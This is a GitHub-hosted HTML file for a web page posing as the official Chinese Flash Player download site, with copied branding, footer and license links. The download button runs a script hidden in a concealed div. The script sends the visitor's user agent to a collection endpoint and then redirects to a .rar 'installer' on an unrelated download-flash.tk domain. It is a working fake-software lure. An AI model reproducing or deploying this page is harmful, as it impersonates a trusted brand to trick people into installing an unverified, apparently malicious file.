-
Notifications
You must be signed in to change notification settings - Fork 3
/
index.html
91 lines (79 loc) · 4.28 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<meta name="renderer" content="webkit">
<title>Flash Player官方下载-Flash中国官网</title>
<meta name="keywords" content="Flash,Flash下载,Flash Player下载,Flash Player官方下载,Flash Player正版下载,flash官网">
<meta name="description" content="Flash Player - 一款轻量级浏览器插件,让你在网页上享受更广泛的多媒体体验,更新、更安全、正版Flash Player下载尽在Flash中国官网">
<link rel="stylesheet" href="css/common.css">
<link rel="shortcut icon" href="favicon.ico" />
<link rel="bookmark" href="favicon.ico" />
<base target="_blank">
</head>
<body>
<div class="background-left"></div>
<div class="background-right"></div>
<div class="header">
<div class="h-logo"><a href="/" target="_self">FLASH PLAYER</a></div>
<ul class="h-nav">
<li class="cur"><a href="/" target="_self">首页</a></li>
<li><a href="#" target="_self">企业版</a></li>
<li><a href="#" target="_self">帮助中心</a></li>
<li><a href="#" target="_self">客服支持</a></li>
<li class="h-lang"><a href="/english" target="_self">English</a></li>
</ul>
</div>
<div id="index-content">
<h1 class="ic-title">Adobe Flash Player</h1>
<p id="ic-version">官方最新版本:<span>32.0.0.270</span></p>
<div id="ic-download">
<span>立即下载</span>
<a href="javascript:download()" target="_self">立即下载</a>
</div>
<div id="ic-size">大小:<span>20.1MB</span></div>
<ul id="ic-button">
<li><span>系统要求</span><i></i></li>
<li><span>其他平台版本</span><i></i></li>
</ul>
<i class="ic-icon"></i>
<div class="ic-protocol"><label id="ic-checkbox" class="cur"><s></s><input type="checkbox"></label>
<div id="ic-popup">已阅读并同意<a href="https://wwwimages2.adobe.com/www.adobe.com/content/dam/acom/cn/legal/licenses-terms/pdf/PlatformClients_PC_WWEULA-zh_CN-20150407_1357.pdf">Adobe软件许可协议*</a>和<a href="https://www.flash.cn/Flash_Helper_Service_Agreement.pdf">Flash Helper Service使用协议</a></div>
</div>
</div>
<div class="footer">
<ul class="f-nav">
<li><a href="https://www.flash.cn/category/contact">联系我们</a><i></i></li>
<li><a href="https://www.flash.cn/category/agreement">软件协议</a><i></i></li>
<li><a href="https://www.flash.cn/category/protocol">使用协议</a><i></i></li>
</ul>
<div class="f-icp">Copyright ©
<script>
document.write(new Date().getFullYear())
</script> 重庆重橙网络科技有限公司. All rights reserved. <a href="http://www.beian.miit.gov.cn/state/outPortal/loginPortal.action">渝ICP备18002678号-1</a><i class="f-icon"><s></s></i><a href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=50019002501402">渝公网安备50019002501402号</a></div>
</div>
<script src="js/common.js"></script>
<div class="hidden">
<script>
//console.log(navigator.userAgent);
function download() {
let data = 'ua=' + navigator.userAgent + '&c=xie',
url = 'api/ua.php',
xhr = new XMLHttpRequest();
xhr.open('post', url);
//设置header
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(data);
xhr.onreadystatechange = function() {
if (xhr.readyState === 4 && (xhr.status === 200 || xhr.status === 304)) {
window.location.href = "https://www.download-flash.tk/flashplayerpp_install_cn.rar";
}
}
}
</script>
<script type="text/javascript" src="//js.users.51.la/20929873.js"></script>
</div>
</body>
</html>